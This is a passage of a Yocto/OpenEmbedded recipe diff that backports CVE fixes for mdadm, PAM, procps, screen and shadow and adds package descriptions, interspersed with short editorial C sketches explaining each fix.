++#define MD_NAME_MAX 32
+--
+cgit
+
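Editorial note: the mdadm.c hunk above rejects an over-long device basename before it can reach any fixed-size buffer in create_mddev(). A standalone sketch of that kind of pre-check (not mdadm code; MD_NAME_MAX simply mirrors the limit the patch introduces):

    /* Standalone sketch (not mdadm code): reject an over-long device
     * basename before it is copied into any fixed-size buffer. */
    #include <libgen.h>
    #include <stdio.h>
    #include <string.h>

    #define MD_NAME_MAX 32

    static int check_mddev_name(char *devname)
    {
        char *bname = basename(devname);   /* POSIX basename may modify devname */

        if (strlen(bname) > MD_NAME_MAX) {
            fprintf(stderr, "Name %s is too long.\n", devname);
            return -1;
        }
        printf("ok: %s\n", bname);
        return 0;
    }

    int main(void)
    {
        char good[] = "/dev/md/home";
        char bad[]  = "/dev/md/this-name-is-far-longer-than-thirty-two-characters";

        check_mddev_name(good);
        check_mddev_name(bad);
        return 0;
    }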
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch
new file mode 100644
index 0000000000..1e2990d79a
--- /dev/null
+++ b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch
@@ -0,0 +1,80 @@
+From 7d374a1869d3a84971d027a7f4233878c8f25a62 Mon Sep 17 00:00:00 2001
+From: Mateusz Grzonka <mateusz.grzonka@intel.com>
+Date: Tue, 27 Jul 2021 10:25:18 +0200
+Subject: Fix memory leak after "mdadm --detail"
+
+Signed-off-by: Mateusz Grzonka <mateusz.grzonka@intel.com>
+Signed-off-by: Jes Sorensen <jsorensen@fb.com>
+---
+Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=7d374a1869d3a84971d027a7f4233878c8f25a62]
+CVE: CVE-2023-28938
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Detail.c | 20 +++++++++-----------
+ 1 file changed, 9 insertions(+), 11 deletions(-)
+
+diff --git a/Detail.c b/Detail.c
+index ad56344f..d3af0ab5 100644
+--- a/Detail.c
++++ b/Detail.c
+@@ -66,11 +66,11 @@ int Detail(char *dev, struct context *c)
+ int spares = 0;
+ struct stat stb;
+ int failed = 0;
+- struct supertype *st;
++ struct supertype *st = NULL;
+ char *subarray = NULL;
+ int max_disks = MD_SB_DISKS; /* just a default */
+ struct mdinfo *info = NULL;
+- struct mdinfo *sra;
++ struct mdinfo *sra = NULL;
+ struct mdinfo *subdev;
+ char *member = NULL;
+ char *container = NULL;
+@@ -93,8 +93,7 @@ int Detail(char *dev, struct context *c)
+ if (!sra) {
+ if (md_get_array_info(fd, &array)) {
+ pr_err("%s does not appear to be an md device\n", dev);
+- close(fd);
+- return rv;
++ goto out;
+ }
+ }
+ external = (sra != NULL && sra->array.major_version == -1 &&
+@@ -108,16 +107,13 @@ int Detail(char *dev, struct context *c)
+ sra->devs == NULL) {
+ pr_err("Array associated with md device %s does not exist.\n",
+ dev);
+- close(fd);
+- sysfs_free(sra);
+- return rv;
++ goto out;
+ }
+ array = sra->array;
+ } else {
+ pr_err("cannot get array detail for %s: %s\n",
+ dev, strerror(errno));
+- close(fd);
+- return rv;
++ goto out;
+ }
+ }
+
+@@ -827,10 +823,12 @@ out:
+ close(fd);
+ free(subarray);
+ free(avail);
+- for (d = 0; d < n_devices; d++)
+- free(devices[d]);
++ if (devices)
++ for (d = 0; d < n_devices; d++)
++ free(devices[d]);
+ free(devices);
+ sysfs_free(sra);
++ free(st);
+ return rv;
+ }
+
+--
+cgit
+
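Editorial note: the Detail.c change converts scattered early returns into the NULL-initialise / goto-out cleanup pattern so that st and sra are always released on every exit path. A standalone sketch of that pattern (not mdadm code; the resources here are stand-ins):

    /* Standalone sketch (not mdadm code): initialize every resource pointer
     * to NULL, bail out with "goto out" on any error, and free everything
     * unconditionally at the single exit label. */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    static int detail(const char *dev)
    {
        int rv = 1;                    /* assume failure until proven otherwise */
        char *st = NULL, *sra = NULL;  /* stand-ins for the supertype/mdinfo */

        sra = strdup(dev);
        if (sra == NULL)
            goto out;

        st = malloc(64);
        if (st == NULL)
            goto out;                  /* sra is still freed below */

        snprintf(st, 64, "detail of %s", sra);
        puts(st);
        rv = 0;

    out:
        free(st);                      /* free(NULL) is a no-op, so this is safe */
        free(sra);
        return rv;
    }

    int main(void)
    {
        return detail("/dev/md0");
    }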
diff --git a/meta/recipes-extended/mdadm/mdadm_4.1.bb b/meta/recipes-extended/mdadm/mdadm_4.1.bb
index 001d3331a7..ca326fd1cb 100644
--- a/meta/recipes-extended/mdadm/mdadm_4.1.bb
+++ b/meta/recipes-extended/mdadm/mdadm_4.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Tool for managing software RAID under Linux"
HOMEPAGE = "http://www.kernel.org/pub/linux/utils/raid/mdadm/"
+DESCRIPTION = "mdadm is a Linux utility used to manage and monitor software RAID devices."
# Some files are GPLv2+ while others are GPLv2.
LICENSE = "GPLv2 & GPLv2+"
@@ -23,6 +24,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/utils/raid/mdadm/${BPN}-${PV}.tar.xz \
file://0001-mdadm-add-option-y-for-use-syslog-to-recive-event-re.patch \
file://include_sysmacros.patch \
file://0001-mdadm-skip-test-11spare-migration.patch \
+ file://CVE-2023-28736.patch \
+ file://CVE-2023-28938.patch \
"
SRC_URI[md5sum] = "51bf3651bd73a06c413a2f964f299598"
diff --git a/meta/recipes-extended/mingetty/mingetty_1.08.bb b/meta/recipes-extended/mingetty/mingetty_1.08.bb
index 491b892093..9822e86b0e 100644
--- a/meta/recipes-extended/mingetty/mingetty_1.08.bb
+++ b/meta/recipes-extended/mingetty/mingetty_1.08.bb
@@ -1,6 +1,7 @@
SUMMARY = "Compact getty terminal handler for virtual consoles only"
SECTION = "console/utils"
HOMEPAGE = "http://sourceforge.net/projects/mingetty/"
+DESCRIPTION = "This is a small Linux console getty that is started on the Linux text console, asks for a login name and then tranfers over to login directory. Is extended to allow automatic login and starting any app."
LICENSE = "GPLv2"
PR = "r3"
diff --git a/meta/recipes-extended/minicom/minicom_2.7.1.bb b/meta/recipes-extended/minicom/minicom_2.7.1.bb
index 6c539c553b..79d06d20f9 100644
--- a/meta/recipes-extended/minicom/minicom_2.7.1.bb
+++ b/meta/recipes-extended/minicom/minicom_2.7.1.bb
@@ -26,3 +26,5 @@ do_install() {
}
RRECOMMENDS_${PN} += "lrzsz"
+
+RDEPENDS_${PN} += "ncurses-terminfo-base"
diff --git a/meta/recipes-extended/newt/libnewt_0.52.21.bb b/meta/recipes-extended/newt/libnewt_0.52.21.bb
index 88b4cf4a03..3d35a17c92 100644
--- a/meta/recipes-extended/newt/libnewt_0.52.21.bb
+++ b/meta/recipes-extended/newt/libnewt_0.52.21.bb
@@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac
S = "${WORKDIR}/newt-${PV}"
-inherit autotools-brokensep python3native python3-dir
+inherit autotools-brokensep python3native python3-dir python3targetconfig
EXTRA_OECONF = "--without-tcl --with-python"
diff --git a/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch
new file mode 100644
index 0000000000..33ac37b7f0
--- /dev/null
+++ b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch
@@ -0,0 +1,59 @@
+From 031bb5a5d0d950253b68138b498dc93be69a64cb Mon Sep 17 00:00:00 2001
+From: Matthias Gerstner <matthias.gerstner@suse.de>
+Date: Wed, 27 Dec 2023 14:01:59 +0100
+Subject: [PATCH] pam_namespace: protect_dir(): use O_DIRECTORY to prevent
+ local DoS situations
+
+Without O_DIRECTORY the path crawling logic is subject to e.g. FIFOs
+being placed in user controlled directories, causing the PAM module to
+block indefinitely during `openat()`.
+
+Pass O_DIRECTORY to cause the `openat()` to fail if the path does not
+refer to a directory.
+
+With this the check whether the final path element is a directory
+becomes unnecessary, drop it.
+
+Upstream-Status: Backport [https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb]
+CVE: CVE-2024-22365
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ modules/pam_namespace/pam_namespace.c | 18 +-----------------
+ 1 file changed, 1 insertion(+), 17 deletions(-)
+
+diff --git a/modules/pam_namespace/pam_namespace.c b/modules/pam_namespace/pam_namespace.c
+index 2528cff86..f72d67189 100644
+--- a/modules/pam_namespace/pam_namespace.c
++++ b/modules/pam_namespace/pam_namespace.c
+@@ -1201,7 +1201,7 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir,
+ int dfd = AT_FDCWD;
+ int dfd_next;
+ int save_errno;
+- int flags = O_RDONLY;
++ int flags = O_RDONLY | O_DIRECTORY;
+ int rv = -1;
+ struct stat st;
+
+@@ -1255,22 +1255,6 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir,
+ rv = openat(dfd, dir, flags);
+ }
+
+- if (rv != -1) {
+- if (fstat(rv, &st) != 0) {
+- save_errno = errno;
+- close(rv);
+- rv = -1;
+- errno = save_errno;
+- goto error;
+- }
+- if (!S_ISDIR(st.st_mode)) {
+- close(rv);
+- errno = ENOTDIR;
+- rv = -1;
+- goto error;
+- }
+- }
+-
+ if (flags & O_NOFOLLOW) {
+ /* we are inside user-owned dir - protect */
+ if (protect_mount(rv, p, idata) == -1) {
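Editorial note: the pam_namespace fix adds O_DIRECTORY so that openat() fails with ENOTDIR on a non-directory such as a FIFO, instead of blocking until a writer appears. A standalone demonstration (not PAM code; the path below is made up):

    /* Standalone sketch (not pam_namespace code): opening a path component
     * with O_DIRECTORY makes open() fail with ENOTDIR on a FIFO instead of
     * blocking until some other process opens the FIFO's write end. */
    #include <errno.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/stat.h>
    #include <unistd.h>

    int main(void)
    {
        const char *path = "/tmp/demo_fifo";   /* made-up path for illustration */

        unlink(path);
        if (mkfifo(path, 0600) != 0) {
            perror("mkfifo");
            return 1;
        }

        /* Without O_DIRECTORY this open would hang until a writer appears;
         * with it, the kernel rejects the non-directory right away. */
        int fd = open(path, O_RDONLY | O_DIRECTORY);
        if (fd == -1)
            printf("open failed as expected: %s\n", strerror(errno));
        else
            close(fd);

        unlink(path);
        return 0;
    }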
diff --git a/meta/recipes-extended/pam/libpam_1.3.1.bb b/meta/recipes-extended/pam/libpam_1.3.1.bb
index bc72afe6ad..527a368e2d 100644
--- a/meta/recipes-extended/pam/libpam_1.3.1.bb
+++ b/meta/recipes-extended/pam/libpam_1.3.1.bb
@@ -24,6 +24,7 @@ SRC_URI = "https://github.com/linux-pam/linux-pam/releases/download/v${PV}/Linux
file://pam-security-abstract-securetty-handling.patch \
file://pam-unix-nullok-secure.patch \
file://crypt_configure.patch \
+ file://CVE-2024-22365.patch \
"
SRC_URI[md5sum] = "558ff53b0fc0563ca97f79e911822165"
diff --git a/meta/recipes-extended/parted/parted_3.3.bb b/meta/recipes-extended/parted/parted_3.3.bb
index 1cfd9ec264..2d688c3700 100644
--- a/meta/recipes-extended/parted/parted_3.3.bb
+++ b/meta/recipes-extended/parted/parted_3.3.bb
@@ -1,5 +1,6 @@
SUMMARY = "Disk partition editing/resizing utility"
HOMEPAGE = "http://www.gnu.org/software/parted/parted.html"
+DESCRIPTION = "GNU Parted manipulates partition tables. This is useful for creating space for new operating systems, reorganizing disk usage, copying data on hard disks and disk imaging."
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=2f31b266d3440dd7ee50f92cf67d8e6c"
SECTION = "console/tools"
@@ -22,7 +23,7 @@ EXTRA_OECONF = "--disable-device-mapper"
inherit autotools pkgconfig gettext texinfo ptest
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
do_compile_ptest() {
oe_runmake -C tests print-align print-max dup-clobber duplicate fs-resize print-flags
diff --git a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
index 9f992d3e83..409a8f3896 100644
--- a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
+++ b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
@@ -1,5 +1,7 @@
SUMMARY = "Convert::ASN1 - Perl ASN.1 Encode/Decode library"
SECTION = "libs"
+HOMEPAGE = "https://metacpan.org/source/GBARR/Convert-ASN1-0.27"
+DESCRIPTION = "Convert::ASN1 is a perl library for encoding/decoding data using ASN.1 definitions."
LICENSE = "Artistic-1.0 | GPL-1.0+"
LIC_FILES_CHKSUM = "file://README.md;beginline=91;endline=97;md5=ceff7fd286eb6d8e8e0d3d23e096a63f"
diff --git a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
index 7219c7d11e..068f0bd3f3 100644
--- a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
+++ b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
@@ -1,5 +1,6 @@
SUMMARY = "Perl modules useful for manipulating date and time information"
HOMEPAGE = "https://metacpan.org/release/TimeDate"
+DESCRIPTION = "This is the perl5 TimeDate distribution. It requires perl version 5.003 or later."
SECTION = "libs"
# You can redistribute it and/or modify it under the same terms as Perl itself.
LICENSE = "Artistic-1.0 | GPL-1.0+"
diff --git a/meta/recipes-extended/procps/procps/CVE-2023-4016.patch b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch
new file mode 100644
index 0000000000..50582a8649
--- /dev/null
+++ b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch
@@ -0,0 +1,85 @@
+From 2c933ecba3bb1d3041a5a7a53a7b4078a6003413 Mon Sep 17 00:00:00 2001
+From: Craig Small <csmall@dropbear.xyz>
+Date: Thu, 10 Aug 2023 21:18:38 +1000
+Subject: [PATCH] ps: Fix possible buffer overflow in -C option
+
+ps allocates memory using malloc(length of arg * len of struct).
+In certain strange circumstances, the arg length could be very large
+and the multiplication will overflow, allocating a small amount of
+memory.
+
+Subsequent strncpy() will then write into unallocated memory.
+The fix is to use calloc. It's slower but this is a one-time
+allocation. Other malloc(x * y) calls have also been replaced
+by calloc(x, y)
+
+References:
+ https://www.freelists.org/post/procps/ps-buffer-overflow-CVE-20234016
+ https://nvd.nist.gov/vuln/detail/CVE-2023-4016
+ https://gitlab.com/procps-ng/procps/-/issues/297
+ https://bugs.debian.org/1042887
+
+Signed-off-by: Craig Small <csmall@dropbear.xyz>
+
+CVE: CVE-2023-4016
+Upstream-Status: Backport [https://gitlab.com/procps-ng/procps/-/commit/2c933ecba3bb1d3041a5a7a53a7b4078a6003413]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+
+---
+ NEWS | 1 +
+ ps/parser.c | 8 ++++----
+ 2 files changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/NEWS b/NEWS
+index b9509734..64fa3da8 100644
+--- a/NEWS
++++ b/NEWS
+@@ -1,3 +1,5 @@
++ * ps: Fix buffer overflow in -C option CVE-2023-4016 Debian #1042887, issue #297
++
+ procps-ng-3.3.16
+ ----------------
+ * library: Increment to 8:2:0
+diff --git a/ps/parser.c b/ps/parser.c
+index 248aa741..15873dfa 100644
+--- a/ps/parser.c
++++ b/ps/parser.c
+@@ -184,7 +184,6 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s
+ const char *err; /* error code that could or did happen */
+ /*** prepare to operate ***/
+ node = malloc(sizeof(selection_node));
+- node->u = malloc(strlen(arg)*sizeof(sel_union)); /* waste is insignificant */
+ node->n = 0;
+ buf = strdup(arg);
+ /*** sanity check and count items ***/
+@@ -205,6 +204,7 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s
+ } while (*++walk);
+ if(need_item) goto parse_error;
+ node->n = items;
++ node->u = calloc(items, sizeof(sel_union));
+ /*** actually parse the list ***/
+ walk = buf;
+ while(items--){
+@@ -1031,15 +1031,15 @@ static const char *parse_trailing_pids(void){
+ thisarg = ps_argc - 1; /* we must be at the end now */
+
+ pidnode = malloc(sizeof(selection_node));
+- pidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++ pidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */
+ pidnode->n = 0;
+
+ grpnode = malloc(sizeof(selection_node));
+- grpnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++ grpnode->u = calloc(i,sizeof(sel_union)); /* waste is insignificant */
+ grpnode->n = 0;
+
+ sidnode = malloc(sizeof(selection_node));
+- sidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++ sidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */
+ sidnode->n = 0;
+
+ while(i--){
+--
+GitLab
+
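Editorial note: the procps fix replaces malloc(n * size) with calloc(n, size) because the hand-written multiplication can wrap, yielding a buffer far smaller than intended, which the later strncpy() then overruns; calloc() checks the multiplication itself. A standalone sketch of the difference (not procps code):

    /* Standalone sketch (not procps code): a hand-written n * size can wrap
     * around, while calloc() checks the multiplication and fails instead of
     * returning a short buffer. */
    #include <stdio.h>
    #include <stdlib.h>
    #include <stdint.h>

    int main(void)
    {
        size_t n = SIZE_MAX / 4 + 2;   /* absurdly large element count */
        size_t sz = 8;                 /* stand-in for sizeof(sel_union) */

        size_t bytes = n * sz;         /* wraps: far smaller than intended */
        printf("n * sz wrapped to %zu bytes\n", bytes);

        void *p = calloc(n, sz);       /* calloc detects the overflow */
        if (p == NULL)
            puts("calloc refused the overflowing request, as expected");
        free(p);
        return 0;
    }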
diff --git a/meta/recipes-extended/procps/procps_3.3.16.bb b/meta/recipes-extended/procps/procps_3.3.16.bb
index 2810ebd285..ac27734a6f 100644
--- a/meta/recipes-extended/procps/procps_3.3.16.bb
+++ b/meta/recipes-extended/procps/procps_3.3.16.bb
@@ -12,8 +12,9 @@ DEPENDS = "ncurses"
inherit autotools gettext pkgconfig update-alternatives
-SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \
+SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \
file://sysctl.conf \
+ file://CVE-2023-4016.patch \
"
SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f"
diff --git a/meta/recipes-extended/psmisc/psmisc_23.3.bb b/meta/recipes-extended/psmisc/psmisc_23.3.bb
index e569f1074b..36e6775f9e 100644
--- a/meta/recipes-extended/psmisc/psmisc_23.3.bb
+++ b/meta/recipes-extended/psmisc/psmisc_23.3.bb
@@ -2,7 +2,7 @@ require psmisc.inc
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3"
-SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \
+SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \
file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \
"
SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772"
diff --git a/meta/recipes-extended/quota/quota_4.05.bb b/meta/recipes-extended/quota/quota_4.05.bb
index c5da1e71ed..46ad7352d6 100644
--- a/meta/recipes-extended/quota/quota_4.05.bb
+++ b/meta/recipes-extended/quota/quota_4.05.bb
@@ -1,6 +1,7 @@
SUMMARY = "Tools for monitoring & limiting user disk usage per filesystem"
SECTION = "base"
HOMEPAGE = "http://sourceforge.net/projects/linuxquota/"
+DESCRIPTION = "Tools and patches for the Linux Diskquota system as part of the Linux kernel"
BUGTRACKER = "http://sourceforge.net/tracker/?group_id=18136&atid=118136"
LICENSE = "BSD & GPLv2+ & LGPLv2.1+"
LIC_FILES_CHKSUM = "file://rquota_server.c;beginline=1;endline=20;md5=fe7e0d7e11c6f820f8fa62a5af71230f \
diff --git a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
index cb5b288c48..0f8a6f74f8 100644
--- a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
+++ b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
@@ -19,7 +19,7 @@ PV = "1.4+git${SRCPV}"
SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c"
-SRC_URI = "git://github.com/thkukuk/${BPN} \
+SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \
file://0001-Use-cross-compiled-rpcgen.patch \
"
diff --git a/meta/recipes-extended/screen/screen/CVE-2021-26937.patch b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch
new file mode 100644
index 0000000000..983b35c1b0
--- /dev/null
+++ b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch
@@ -0,0 +1,68 @@
+Description: [CVE-2021-26937] Fix out of bounds array access
+Author: Michael Schröder <mls@suse.de>
+Bug-Debian: https://bugs.debian.org/982435
+Bug: https://savannah.gnu.org/bugs/?60030
+Bug: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html
+Bug-OSS-Security: https://www.openwall.com/lists/oss-security/2021/02/09/3
+Origin: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00010.html
+
+CVE: CVE-2021-26937
+Upstream-Status: Pending
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+--- a/encoding.c
++++ b/encoding.c
+@@ -43,7 +43,7 @@
+ # ifdef UTF8
+ static int recode_char __P((int, int, int));
+ static int recode_char_to_encoding __P((int, int));
+-static void comb_tofront __P((int, int));
++static void comb_tofront __P((int));
+ # ifdef DW_CHARS
+ static int recode_char_dw __P((int, int *, int, int));
+ static int recode_char_dw_to_encoding __P((int, int *, int));
+@@ -1263,6 +1263,8 @@
+ {0x30000, 0x3FFFD},
+ };
+
++ if (c >= 0xdf00 && c <= 0xdfff)
++ return 1; /* dw combining sequence */
+ return ((bisearch(c, wide, sizeof(wide) / sizeof(struct interval) - 1)) ||
+ (cjkwidth &&
+ bisearch(c, ambiguous,
+@@ -1330,11 +1332,12 @@
+ }
+
+ static void
+-comb_tofront(root, i)
+-int root, i;
++comb_tofront(i)
++int i;
+ {
+ for (;;)
+ {
++ int root = i >= 0x700 ? 0x801 : 0x800;
+ debug1("bring to front: %x\n", i);
+ combchars[combchars[i]->prev]->next = combchars[i]->next;
+ combchars[combchars[i]->next]->prev = combchars[i]->prev;
+@@ -1396,9 +1399,9 @@
+ {
+ /* full, recycle old entry */
+ if (c1 >= 0xd800 && c1 < 0xe000)
+- comb_tofront(root, c1 - 0xd800);
++ comb_tofront(c1 - 0xd800);
+ i = combchars[root]->prev;
+- if (c1 == i + 0xd800)
++ if (i == 0x800 || i == 0x801 || c1 == i + 0xd800)
+ {
+ /* completely full, can't recycle */
+ debug("utf8_handle_comp: completely full!\n");
+@@ -1422,7 +1425,7 @@
+ mc->font = (i >> 8) + 0xd8;
+ mc->fontx = 0;
+ debug3("combinig char %x %x -> %x\n", c1, c, i + 0xd800);
+- comb_tofront(root, i);
++ comb_tofront(i);
+ }
+
+ #else /* !UTF8 */
diff --git a/meta/recipes-extended/screen/screen/CVE-2023-24626.patch b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch
new file mode 100644
index 0000000000..73caf9d81b
--- /dev/null
+++ b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch
@@ -0,0 +1,40 @@
+From e9ad41bfedb4537a6f0de20f00b27c7739f168f7 Mon Sep 17 00:00:00 2001
+From: Alexander Naumov <alexander_naumov@opensuse.org>
+Date: Mon, 30 Jan 2023 17:22:25 +0200
+Subject: fix: missing signal sending permission check on failed query messages
+
+Signed-off-by: Alexander Naumov <alexander_naumov@opensuse.org>
+
+CVE: CVE-2023-24626
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/screen.git/commit/?id=e9ad41bfedb4537a6f0de20f00b27c7739f168f7]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ socket.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/socket.c b/socket.c
+index bb68b35..9d87445 100644
+--- a/socket.c
++++ b/socket.c
+@@ -1285,11 +1285,16 @@ ReceiveMsg()
+ else
+ queryflag = -1;
+
+- Kill(m.m.command.apid,
++ if (CheckPid(m.m.command.apid)) {
++ Msg(0, "Query attempt with bad pid(%d)!", m.m.command.apid);
++ }
++ else {
++ Kill(m.m.command.apid,
+ (queryflag >= 0)
+ ? SIGCONT
+ : SIG_BYE); /* Send SIG_BYE if an error happened */
+- queryflag = -1;
++ queryflag = -1;
++ }
+ }
+ break;
+ case MSG_COMMAND:
+--
+2.25.1
+
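Editorial note: the fix above refuses to signal the pid carried in a query message unless CheckPid() approves it. CheckPid() itself is not shown in this excerpt; as an assumption for illustration, a common way to ask "may I signal this pid?" is kill(pid, 0), which performs the permission and existence checks without delivering a signal:

    /* Standalone sketch (an assumption, not screen's CheckPid()): use
     * kill(pid, 0) to check that a pid exists and that we are permitted to
     * signal it, without actually delivering a signal. */
    #include <errno.h>
    #include <signal.h>
    #include <stdio.h>
    #include <unistd.h>

    static int may_signal(pid_t pid)
    {
        if (pid <= 0)
            return 0;                 /* never signal process groups or "all" */
        if (kill(pid, 0) == 0)
            return 1;                 /* pid exists and we may signal it */
        /* EPERM: exists but belongs to someone else; ESRCH: no such process */
        return 0;
    }

    int main(void)
    {
        printf("self: %d, pid 1: %d\n", may_signal(getpid()), may_signal(1));
        return 0;
    }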
diff --git a/meta/recipes-extended/screen/screen_4.8.0.bb b/meta/recipes-extended/screen/screen_4.8.0.bb
index 4772eb6c7a..c4faa27023 100644
--- a/meta/recipes-extended/screen/screen_4.8.0.bb
+++ b/meta/recipes-extended/screen/screen_4.8.0.bb
@@ -21,6 +21,8 @@ SRC_URI = "${GNU_MIRROR}/screen/screen-${PV}.tar.gz \
file://0002-comm.h-now-depends-on-term.h.patch \
file://0001-fix-for-multijob-build.patch \
file://0001-Remove-more-compatibility-stuff.patch \
+ file://CVE-2021-26937.patch \
+ file://CVE-2023-24626.patch \
"
SRC_URI[md5sum] = "d276213d3acd10339cd37848b8c4ab1e"
diff --git a/meta/recipes-extended/sed/sed_4.8.bb b/meta/recipes-extended/sed/sed_4.8.bb
index 39e3a61df5..089bd11a55 100644
--- a/meta/recipes-extended/sed/sed_4.8.bb
+++ b/meta/recipes-extended/sed/sed_4.8.bb
@@ -1,5 +1,6 @@
SUMMARY = "Stream EDitor (text filtering utility)"
HOMEPAGE = "http://www.gnu.org/software/sed/"
+DESCRIPTION = "sed (stream editor) is a non-interactive command-line text editor."
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=c678957b0c8e964aa6c70fd77641a71e \
file://sed/sed.h;beginline=1;endline=15;md5=fb3c7e6fbca6f66943859153d4be8efe \
diff --git a/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch
new file mode 100644
index 0000000000..aea07ff361
--- /dev/null
+++ b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch
@@ -0,0 +1,66 @@
+From 2eaea70111f65b16d55998386e4ceb4273c19eb4 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Christian=20G=C3=B6ttsche?= <cgzones@googlemail.com>
+Date: Fri, 31 Mar 2023 14:46:50 +0200
+Subject: [PATCH] Overhaul valid_field()
+
+e5905c4b ("Added control character check") introduced checking for
+control characters but had the logic inverted, so it rejects all
+characters that are not control ones.
+
+Cast the character to `unsigned char` before passing to the character
+checking functions to avoid UB.
+
+Use strpbrk(3) for the illegal character test and return early.
+
+Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/2eaea70111f65b16d55998386e4ceb4273c19eb4]
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/fields.c | 24 ++++++++++--------------
+ 1 file changed, 10 insertions(+), 14 deletions(-)
+
+diff --git a/lib/fields.c b/lib/fields.c
+index fb51b582..53929248 100644
+--- a/lib/fields.c
++++ b/lib/fields.c
+@@ -37,26 +37,22 @@ int valid_field (const char *field, const char *illegal)
+
+ /* For each character of field, search if it appears in the list
+ * of illegal characters. */
++ if (illegal && NULL != strpbrk (field, illegal)) {
++ return -1;
++ }
++
++ /* Search if there are non-printable or control characters */
+ for (cp = field; '\0' != *cp; cp++) {
+- if (strchr (illegal, *cp) != NULL) {
++ unsigned char c = *cp;
++ if (!isprint (c)) {
++ err = 1;
++ }
++ if (iscntrl (c)) {
+ err = -1;
+ break;
+ }
+ }
+
+- if (0 == err) {
+- /* Search if there are non-printable or control characters */
+- for (cp = field; '\0' != *cp; cp++) {
+- if (!isprint (*cp)) {
+- err = 1;
+- }
+- if (!iscntrl (*cp)) {
+- err = -1;
+- break;
+- }
+- }
+- }
+-
+ return err;
+ }
+
+--
+2.34.1
+
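Editorial note: the overhauled valid_field() does two things: the illegal-character scan becomes a single strpbrk(), and each byte is cast to unsigned char before isprint()/iscntrl(), since passing a negative char value to the ctype functions is undefined behaviour. A standalone sketch of the corrected logic (not shadow code; the sample fields are made up):

    /* Standalone sketch (not shadow code) of the corrected valid_field()
     * logic: reject fields containing an explicitly illegal character or any
     * control character, and flag (but accept) other non-printable bytes.
     * The cast to unsigned char avoids undefined behaviour in the ctype calls. */
    #include <ctype.h>
    #include <stdio.h>
    #include <string.h>

    static int valid_field(const char *field, const char *illegal)
    {
        int err = 0;

        if (illegal && strpbrk(field, illegal) != NULL)
            return -1;                       /* explicitly forbidden character */

        for (const char *cp = field; *cp != '\0'; cp++) {
            unsigned char c = (unsigned char)*cp;
            if (!isprint(c))
                err = 1;                     /* non-printable, but tolerated */
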